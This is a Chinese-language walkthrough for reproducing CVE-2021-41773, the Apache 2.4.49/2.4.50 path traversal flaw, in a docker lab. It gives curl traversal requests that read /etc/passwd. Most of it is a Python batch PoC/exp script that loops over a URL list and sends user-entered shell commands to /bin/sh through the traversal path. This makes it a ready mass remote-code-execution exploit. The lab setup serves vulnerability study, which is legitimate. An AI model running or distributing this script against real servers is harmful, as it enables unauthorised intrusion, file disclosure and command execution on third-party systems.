CVE-2021-41773 Apache2.4.49&50 路径穿越漏洞复现
漏洞原理及影响版本
此次漏洞影响的版本有2.4.49 & 2.4.50版本的ahache
CVE-2021-41773 是在 Apache HTTP Server 2.4.49 中对路径规范化所做的更改中发现了一个缺陷。攻击者可以使用路径遍历攻击将 URL 映射到预期文档根目录之外的文件,如果文档根目录之外的文件不受“要求全部拒绝”的保护,则这些请求可能会成功,如果还为这些别名路径启用了 CGI 脚本,则可以允许远程代码执行。
此外,此缺陷可能会泄漏 CGI 脚本等解释文件的来源,已知此问题已被广泛利用。
此问题仅影响 Apache 2.4.49 和 Apache 2.4.50而不是早期版本。
参考链接:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-41773
1.环境搭建
此次的漏洞复现是在docker上进行
1.1docker的安装
docker的安装可从官网上看https://docs.docker.com/engine/install/centos/
或者看我博文:https://editor.csdn.net/md/?articleId=116257398
1.2从平台上拉取apache 2.4.49版本
拉取apache镜像
docker pull httpd:2.4.49
查看镜像版本是否正确
docker images
启动镜像
docker run -d -P e91425f38618
docker ps
进入容器
docker exec -it 4af5d1983b99 /bin/bash
修改镜像里面conf/httpd.conf的配置文件
如果出现以下这种情况,则输入以下两行代码即可安装vim
apt-get update
apt-get -y install vim
编辑conf/httpd.conf下的这两行,注释掉重新加进去
2.漏洞复现
查看映射端口
浏览器访问
用另一台机器访问
curl http://192.168.160.129:49154
curl http://192.168.160.129:49154/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
也可以用抓包改包软件来重构exp获取
批量poc&&exp脚本:
import requests
from requests import Request,Session
#http://192.168.81.136:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh
hearder={
"Accept":"*/*",
"Accept-Language": "en",
"Connection": "close",
"Content-Type": "application/x-www-form-urlencoded",
"User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:0.9.4) Gecko/20011128 Netscape6/6.2.1",
}
# proxy={
# "http":"http://127.0.0.1:8080"
# }
def ahs(cmd):
u = open('url.txt','r',encoding='utf-8')
for url in u:
try:
icon = "/icons/"
p = requests.get(url=url, headers=hearder,timeout=1)
if p.status_code == 200:
s = Session()
url_poc = url+"/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
req1 = Request('GET',url=url_poc,headers=hearder)
pre = req1.prepare()
pre.url = url_poc
response1 = s.send(pre,timeout=1)#,proxies=proxy)
if response1.status_code == 200:
# print(response1.text)
try:
url_exp = url+"/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh"
command = "echo;"+cmd
req = Request('POST', url=url_exp, data=command, headers=hearder)
prepare = req.prepare() # 转换成元类
prepare.url = url_exp
response = s.send(prepare, timeout=1) # ,proxies=proxy)
out = response.text
# out=out.replace('\n', '')
print("输出结果为:"+out)
except Exception as e:
pass
else:
print(response1.status_code)
else:
print(p.status_code)
except Exception as e:
pass
print("无poc"+'\n')
if __name__ == '__main__':
print("本代码为‘Apache HTTP Server 2.4.49中的路径遍历和文件泄漏漏洞(CVE-2021-41773)’的poc及exp批量化代码")
cmd=input("请输入注入命令:")
ahs(cmd)